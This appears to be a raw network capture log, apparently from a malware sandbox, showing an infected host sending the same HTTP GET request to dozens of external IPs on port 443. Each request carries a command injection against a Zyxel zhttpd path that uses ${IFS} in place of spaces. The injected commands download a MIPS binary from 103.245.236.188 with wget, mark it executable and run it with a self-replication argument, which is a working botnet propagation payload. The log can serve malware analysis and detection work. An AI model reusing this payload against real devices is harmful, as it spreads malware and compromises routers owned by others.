                                    Jan 13, 2024 19:02:37.261471033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5243192.168.2.1341024220.244.112.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.261523962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5244192.168.2.1343554168.58.191.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.261576891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5245192.168.2.1339090142.191.211.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.261634111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5246192.168.2.1345772150.163.27.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.261688948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5247192.168.2.1338160123.41.31.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.261748075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5248192.168.2.133600853.195.61.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.261784077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5249192.168.2.134730485.196.252.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.261823893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5250192.168.2.1348994112.205.183.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.261877060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5251192.168.2.1358580183.72.226.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.261939049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5252192.168.2.1345116221.90.14.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.261991978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5253192.168.2.1354992164.82.85.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.262048006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5254192.168.2.1354328182.69.93.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.262089968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5255192.168.2.1354046137.99.188.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.262154102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5256192.168.2.1350798147.9.218.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.262203932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5257192.168.2.133486013.195.179.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.262257099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5258192.168.2.1337340184.160.131.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.262283087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5259192.168.2.135176659.65.54.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.262348890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5260192.168.2.133629623.49.116.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.262396097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5261192.168.2.1346914182.168.216.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.262448072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5262192.168.2.134156646.95.68.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.262511015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5263192.168.2.13483789.172.22.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.262557983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5264192.168.2.1360702101.192.188.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.262609959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5265192.168.2.133861272.176.243.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.262672901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5266192.168.2.136000077.163.248.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.262737036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5267192.168.2.135651270.247.119.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.262785912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5268192.168.2.1352408134.180.134.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.262857914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5269192.168.2.1352846102.50.152.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.262912035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5270192.168.2.1359514159.120.12.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.262969971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5271192.168.2.1344848191.141.213.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.263020039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5272192.168.2.135426491.51.181.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.263070107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5273192.168.2.133355267.255.23.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.263114929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5274192.168.2.135042665.155.52.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.263153076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5275192.168.2.13417501.228.118.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.263216972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5276192.168.2.1354922103.81.20.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.263266087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5277192.168.2.134393642.128.143.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.263324976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5278192.168.2.1342942145.8.34.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.263374090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5279192.168.2.133875478.65.141.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.263432980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5280192.168.2.1339290202.241.225.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.263498068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5281192.168.2.133303617.171.116.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.263531923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5282192.168.2.133833017.71.46.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.263593912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5283192.168.2.1349906186.239.6.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.263659954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5284192.168.2.135013437.108.244.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.263710022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5285192.168.2.1339304166.197.32.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.263761997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5286192.168.2.1360792131.245.165.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.263813019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5287192.168.2.133979042.130.183.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.263915062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5288192.168.2.1333580155.28.110.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.263968945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5289192.168.2.134750649.250.157.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.264012098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5290192.168.2.1341474125.193.117.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.264079094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5291192.168.2.1351974171.40.149.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.264125109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5292192.168.2.1353182110.175.97.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.264180899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5293192.168.2.1342028105.98.105.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.263751030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5294192.168.2.1354682168.141.67.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.263823986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5295192.168.2.1335336169.124.152.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.263988018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5296192.168.2.134218487.43.191.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.264019966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5297192.168.2.1352564107.241.209.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.264074087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5298192.168.2.1334766120.158.135.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.264141083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5299192.168.2.1340626223.81.88.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.264206886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5300192.168.2.1334738133.215.46.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.264256954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5301192.168.2.1358348177.12.126.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.264311075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5302192.168.2.1339276174.3.203.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.264374971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5303192.168.2.1353322192.216.76.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.264415979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5304192.168.2.134997889.9.148.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.264486074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5305192.168.2.135360273.163.68.15443
                                    TimestampBytes transferredDirectionData
